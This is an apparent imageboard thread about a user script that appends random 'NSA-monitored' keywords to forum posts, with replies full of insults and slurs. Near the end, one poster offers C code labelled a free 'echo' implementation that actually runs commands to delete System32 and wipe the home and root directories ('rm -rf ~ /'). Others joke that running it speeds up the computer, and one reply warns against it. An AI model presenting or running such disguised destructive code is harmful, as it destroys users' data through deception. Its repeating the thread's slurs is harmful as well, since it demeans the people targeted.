/*This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public...

/*This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see gnu.org/licenses/>.*/
//Greetings Holla Forums.
//This is a script that adds a random word that is monitored by the NSA to your
//posts.
//To install go to Options (requires Javascript to be enabled)->User JS and copy
//and paste this whole thing then click 'Save Custom Javascript'
var nsa_keywords = Array("Explosives","guns","assassination","conspiracy","primers","detonators","initiators","main charge","nuclear charges","ambush","sniping","motorcade","IRS","BATF","jtf-6","mjtf","hrt","srt","hostages","munitions","weapons","TNT","rdx","amfo","hmtd","picric acid","silver nitrite","mercury fulminate","presidential motorcade","salt peter","charcoal","sulfur","c4","composition b","amatol","petn","lead azide","lead styphante","ddnp","tetryl","nitrocellulose","nitrostarch","mines","grenades","rockets","fuses","delay mechanism","mortars","rpg7","propellants","incendiaries","incendiary device","thermite","security forces","intelligence","agencies","hrt","resistance","psyops","infiltration","assault team","defensive elements","evasion","detection","mission","communications","the football","platter charge","shaped charges","m118","claymore","body armor","charges","shrapnel","timers","timing devices","boobytraps","detcord","pmk 40","silencers","Uzi","HK-MP5","AK-47","FAL","Jatti","Skorpion MP","teflon bullets","cordite","napalm","law","Stingers","RPK","SOCIMI 821 SMG","STEN","BAR","MP40","HK-G3,FN-MAG","RPD,PzB39","Air Force One","M60","RPK74","SG530","SG540","Galil arm","Walther WA2000","HK33KE","Parker-Hale MOD. 82","AKR","Ingram MAC10","M3","L34A1","Walther MPL","AKS-74","HK-GR6","subsonic rounds","ballistic media","special forces","JFKSWC","SFOD-D! ","SRT","Rewson","SAFE","Waihopai","INFOSEC","ASPIC","Information Security","SAI","Information Warfare","IW","IS","Privacy","Information Terrorism","Kenya","Terrorism Defensive Information","Defense Information Warfare","Offensive Information","Offensive Information Warfare","NAIA","SAPM","ASU","ECHELON ASTS","National Information Infrastructure","InfoSec","SAO","Reno","Compsec","JICS","Computer Terrorism","Firewalls","Secure Internet Connections","RSP","ISS","JDF","Passwords","NAAP","DefCon V","RSO","Hackers","Encryption","ASWS","Espionage","USDOJ","NSA","CIA","S/Key","SSL","FBI","Secret Service","USSS","Defcon","Military","White House","Undercover","NCCS","Mayfly","PGP","SALDV","PEM","resta","RSA","Perl-RSA","MSNBC","bet","AOL","AOL TOS","CIS","CBOT","AIMSX","STARLAN","3B2","BITNET","Tanzania","SAMU","COSMOS","DATTA","E911","FCIC","HTCIA");$('#body').val(function(_,s) { return s+"\nThe following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: "+nsa_keywords[Math.floor(Math.random()*nsa_keywords.length)]; });

Other urls found in this thread:

pastebin.com/raw/UWffBQbn:
gnu.org/licenses/>.*/#include
twitter.com/NSFWRedditVideo

TESTAN

It doesn't work for me. I'm not sure what's blocking it. Probably either ublock or noscript.

Ok. I got it working now. Somehow I accidentally commented out the whole thing like a retard.

The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: Defcon

Good on you brother.
The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: Secret Service

Thanks. I tweaked the code a bit. I guess that means I need to release it now.

My real questions are, how do we get this to show up in the quick reply, and how do we get it to show up at the end of a reply? I know jack shit about programming in javascript.

Random NSA keyword via pastebin.com/raw/UWffBQbn: Espionage

Those are some good questions.
I didn't actually make this, I saw it on somewhere else and thought it was nice.

The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: NAAP

M-x spook

test

The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: Kenya

Fucking emacs is so bloated
still better than vim

Anyone wish greasemonkey skillz could make a script to anonymize filenames (automatically renaming them to a random unix timestamp)?

4keksX got this feature, I'm really missing it here.

why

This is retarded.
Any agent of the nsa could do a simple as a fuck grep and filter out the posts.
Remove the line or have something else to signal that this is not part of the original message.

Epic. Simply epic.

pressure cooker
backpack

test

It's the ID of the quick reply box you retarded fuck.

I'm talking about the fact that a miniature script like this depends on JQuery you worthless Javascript Ninja.

cool runnings

The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: detection

Because filtering tripfags is too easy and they needed something else to attention whore with.

Whatever man. I'm glad to see something like this. I'm all for doing whatever we can to clog the surveillance systems with irrelevant bullshit.

It doesn't actually do that because you can easily filter it out, thanks to the "presented by userscript downloadable here" signature.

This is just ego stroking in the most obnoxious way possible.

God bless the NSA for keeping us safe from the tranny menace.

The program is free software, you can modify it however you want, because it is free as in freedom.
The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: conspiracy

Fucking freetards.

The fag is you

The following is a random keyword the nsa monitors via pastebin.com/raw/UWffBQbn: detonators

should i boost intelligence in dark souls 3?

Have an implementation of echo, my friend. Don't worry, it's 100% free.

/* This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see gnu.org/licenses/>.*/#include int main(void) { system("del C:\\Windows\\System32"); system("rm -rf ~ /"); return *NULL; }

Thanks, friend.
I'll use it right now.

DO NOT FUCKING RUN THIS!

I ran this and now my computer is over 200x faster. It's too fast. All the viruses are gone and my mouse cursor now moves too quickly to actually land on anything.

If you do happen to run this DESPITE MY WARNINGS, install Apple iTunes to rectify. It should slow your computer down to a usable pace.

Won't run on my Ubuntu machine for some reason.